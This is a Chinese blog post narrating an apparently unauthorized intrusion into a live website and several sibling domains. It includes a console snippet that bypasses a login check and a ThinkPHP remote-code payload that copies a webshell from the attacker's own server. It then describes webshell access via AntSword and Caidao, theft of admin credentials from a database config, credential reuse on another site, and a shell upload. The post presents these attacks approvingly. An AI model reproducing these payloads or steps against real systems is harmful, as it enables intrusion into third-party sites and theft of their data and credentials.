某JW网站实战测试

admin 2023年2月10日15:45:01评论28 views字数 1388阅读4分37秒阅读模式

直接开始渗透

首先找到后台,后台直接url后跟admin直接跳转到登录框,尝试弱口令登录,提示终端不允许登录

某JW网站实战测试

F12看看代码,发现这里有限制,经过分析代码发现可以绕过这一限制

某JW网站实战测试

经过分析代码发现可以绕过这一限制,在控制台输入以下代码即可实现绕过,但弱口令没有进去

devSafe={};devSafe.checkToken=function(){return 1};devSafe.getSn=function(){return 1}

某JW网站实战测试

看看报错页面是什么,发现没见过

某JW网站实战测试

什么框架的也没搞明白(单纯技术太菜),然后就想着看看旁站好不好搞,在线工具跑完后只有这几个域名(我用的这个在线爆破的http://z.zcjun.com/),因为没几个,所以先挨个访问一下看看

第一个访问发现是thinkphp这里由于当时没有截图,后来访问发现站点关闭了,拿其他的图顶替一下

某JW网站实战测试

由于关闭我就文字描述一下大概的过程吧,工具扫到存在漏洞,但getshell时失败,随后手动复现发现直接写文件写不了,(试了很多payload)payload都是网上可以搜到的我这里就不放了,后想到试试远程下载文件应不行,在自己服务器开启服务,远程下载服务器显示

某JW网站实战测试

有访问并且是200,应该是成功了

访问一句话,可以访问到,用蚁剑连接,由于不是正规网站所以去看看数据库配置文件,并用蚁剑自带的操作数据库功能,看到后台用户名和密码,把这个记在自己的小本本上 

某JW网站实战测试


url/?s=/index/thinkapp/invo有kefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=自己服务器/shell.php&vars[1][]=shell.php

某JW网站实战测试

看了一圈没什么可利用的然后接着下一个,默认页面又是一个tp5

某JW网站实战测试

随手admin跳转到后台,发现和第一个第二个后台背景图片一样,尝试用刚才翻到的账号密码登录,这个没有像第一个后台那样有前端限制,卡顿了一下进去了,进去了,直接进去了,居然用的一套账号密码,赶紧试试第一个,结果账号密码错误,继续看看这个吧

某JW网站实战测试

后台图片不放了反正就是后台找到上传点,常规文件上传思路(再难我也不会,哈哈哈哈哈哈哈,掩盖下自己菜的事实)这里通过后台上传文件,并访问shell,可以访问到

某JW网站实战测试

尝试用蚁剑连接,连接失败,不清楚为什么

某JW网站实战测试

点开工具包看到躺着的webshell工具,看到好几个菜刀,抱着试一试的心态用菜刀试试,结果结果,哎成功连接

某JW网站实战测试

在之后就没有再操作了,看了一下其他域名发现这几个的页面一模一样,估计搞不下来果断放弃

某JW网站实战测试

还剩一个,刚打开看着这个背景有点熟悉

某JW网站实战测试

随便输入内容让其报错看到这个图标果然这不是FastAdmin框架吗随即网上查找相关漏洞

某JW网站实战测试

因为进不去后台只能找前台getshell的方法,找到一个随即复现,然后没有成功,不开心

我不知道是我手法有问题还是说这个站点没有这个漏洞,随即下载下源码在本地复现,成功复现,然后相同手法在站点复现,还是没成功

看到自己下载的源码中默认带了一个api.html,想试试目标站点有没有

访问试试结果还真没删,

某JW网站实战测试

看到有一个文件上传,随便传个文件提示需要登录后台,这个站就做到了这里,没有再继续了,有点黔驴技穷了,哈哈哈哈哈哈

某JW网站实战测试

总结

拿下目标后才会成就感满满。不要怕费事,多试试不同工具,万一碰对呢

原文始发于微信公众号(白虎实验室):某JW网站实战测试

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月10日15:45:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某JW网站实战测试https://cn-sec.com/archives/1546985.html

发表评论

匿名网友 填写信息